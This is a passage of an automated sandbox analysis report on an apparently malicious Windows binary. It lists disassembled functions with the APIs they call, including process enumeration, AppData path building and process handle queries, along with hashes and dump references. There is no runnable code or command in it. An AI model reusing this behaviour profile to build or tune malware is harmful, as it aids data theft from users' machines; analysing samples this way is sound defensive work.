                            Function 008E8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E8737
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: fe129591527c11648777e4a27a2627e6cfa7f43978267d6c4d5e36b6541715a0
                            • Instruction ID: 7a09056b44debfa077f483ccd6adf2b5fa4ab36980929e8f191e0121038e9e26
                            • Opcode Fuzzy Hash: fe129591527c11648777e4a27a2627e6cfa7f43978267d6c4d5e36b6541715a0
                            • Instruction Fuzzy Hash: B3F09027B000258F8314643E8D8449EA947A6E639033AC735E85EEF399DC71EC8295D1
                            Function 00903C20 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00903C66
                            • Process32First.KERNEL32(00000000,00000128), ref: 00903C79
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00903C8F
                              • Part of subcall function 00907520: lstrlen.KERNEL32(------,008E5BEB), ref: 0090752B
                              • Part of subcall function 00907520: lstrcpy.KERNEL32(00000000), ref: 0090754F
                              • Part of subcall function 00907520: lstrcat.KERNEL32(?,------), ref: 00907559
                              • Part of subcall function 00907490: lstrcpy.KERNEL32(00000000), ref: 009074BE
                            • CloseHandle.KERNEL32(00000000), ref: 00903DC7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 4539120566c12a019cb915de213395b3e680a56444b467863878f9a3297c6e43
                            • Instruction ID: 947c402a98c0de6e09a3e50666b8e8755a19725bcf0063ec804499ca0d05e68b
                            • Opcode Fuzzy Hash: 4539120566c12a019cb915de213395b3e680a56444b467863878f9a3297c6e43
                            • Instruction Fuzzy Hash: B6810270900215DFD714CF19D948B95B7F9BB44728F29C1A9D418AB2E2D7369E82CF80
                            Function 008FE6E0 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FE724
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE753
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE761
                            • lstrcat.KERNEL32(?,012FE160), ref: 008FE77C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: b8acc28bf63cdc5c07e72dba6fc1faa4a0fe1dc68217cef6db05fad04757a0a5
                            • Instruction ID: b090643c63ab3a2b720bff3d05e5dbf35d8bc43313ef87731eecfd1095607f4d
                            • Opcode Fuzzy Hash: b8acc28bf63cdc5c07e72dba6fc1faa4a0fe1dc68217cef6db05fad04757a0a5
                            • Instruction Fuzzy Hash: 6251A9B6A1015CAFCB15EB68DC46EFE3379FB48300F444468BA05D7351DE70AE818B92
                            Function 009021A0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 009021AF, 009021C5, 00902287
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: 641cc4c61d603ab9d67593e5b74cf8b29f952bfaed2375d0197a38420fb6ab4e
                            • Instruction ID: 7f8505f94e0a7d9b92b68450ba492f97ea1d33ac386ecb3662d10492988e513d
                            • Opcode Fuzzy Hash: 641cc4c61d603ab9d67593e5b74cf8b29f952bfaed2375d0197a38420fb6ab4e
                            • Instruction Fuzzy Hash: 41215739A141898FDB18EBFDC8587ECF36AEFC4362F944456C82C0B2C1E235094AD795
                            Function 008FED50 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FED94
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEDC3
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEDD1
                            • lstrcat.KERNEL32(?,012FF828), ref: 008FEDEC
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: eb53560002e5cef029a517a7fcda335b481b771baba24daf37275b3ea347f697
                            • Instruction ID: 27528da9349316a75dd0f95f1114a3518766df7f2ba43d1a964d6f7c1ada27c8
                            • Opcode Fuzzy Hash: eb53560002e5cef029a517a7fcda335b481b771baba24daf37275b3ea347f697
                            • Instruction Fuzzy Hash: A1319272A1015CABCB21EB68DC45EEE77B8FF49300F1044B8BA05D7251DE709E848B91
                            Function 00902D30 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0090A5E0,000000FF), ref: 00902D5F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00902D66
                            • GetLocalTime.KERNEL32(?,?,00000000,0090A5E0,000000FF), ref: 00902D72
                            • wsprintfA.USER32 ref: 00902D9E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 53a329f3e3ba2e90a11cb2cee5445dd9ac82a035e1a1d81cecdeb84d3ff7defd
                            • Instruction ID: d3da171bf10afdee728bdc35c4ca8131cf0dda9d44a6a5842d3ced3a95d6e14c
                            • Opcode Fuzzy Hash: 53a329f3e3ba2e90a11cb2cee5445dd9ac82a035e1a1d81cecdeb84d3ff7defd
                            • Instruction Fuzzy Hash: 8A0140B2944124ABCB149BC9DD49FFEB7BCFB4CB11F00411AFA05A2280EB785540C7B1
                            Function 00904690 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 009046A2
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 009046BD
                            • CloseHandle.KERNEL32(00000000), ref: 009046C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 009046F7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: cca03d09277bb647a84833486bad6c90943116f7209e6bc5107615e7de0eef0f
                            • Instruction ID: 462baf8e0ae47e12de0f977c66fadeb48bcd174baa3223b190b3cb09c33f81bf
                            • Opcode Fuzzy Hash: cca03d09277bb647a84833486bad6c90943116f7209e6bc5107615e7de0eef0f
                            • Instruction Fuzzy Hash: 1DF0C2F09012656FE720AB749C4DBE6BAACAB15710F4045A1AB89D71C0EAB099818790
                            Function 009091E1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 009091ED
                              • Part of subcall function 00908A0F: __amsg_exit.LIBCMT ref: 00908A1F
                            • __getptd.LIBCMT ref: 00909204
                            • __amsg_exit.LIBCMT ref: 00909212
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00909236
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 0b0c62a7e9616f50acc3ca5714e0c93a2bea3cc947024f8e4b82d50597141849
                            • Instruction ID: 6d7d1b99ea2d5dc732aa691ee74c79fc3daebc5ff6189849b4daedd96299011f
                            • Opcode Fuzzy Hash: 0b0c62a7e9616f50acc3ca5714e0c93a2bea3cc947024f8e4b82d50597141849
                            • Instruction Fuzzy Hash: 05F09072F98710AFD721BBBC9802B8EB3A16F80720F114209F458A62D3CF346A40DA55
                            Function 00907520 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(------,008E5BEB), ref: 0090752B
                            • lstrcpy.KERNEL32(00000000), ref: 0090754F
                            • lstrcat.KERNEL32(?,------), ref: 00907559
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 33448610d8ec54b1a392dfb98a709b7298839e8375bb1fb8ed8e25abef9d969d
                            • Instruction ID: 38e455c2d236ec69c2c718f7191d43c8afea806e4d40916c3a8d44e3d2345ace
                            • Opcode Fuzzy Hash: 33448610d8ec54b1a392dfb98a709b7298839e8375bb1fb8ed8e25abef9d969d
                            • Instruction Fuzzy Hash: B0F0C9749117429FDB209F79DC58966BBF9EF85711314882DA89AC7295EB30E841CB10
                            Function 008F3520 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F3572
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F359B
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F35C1
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F35E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
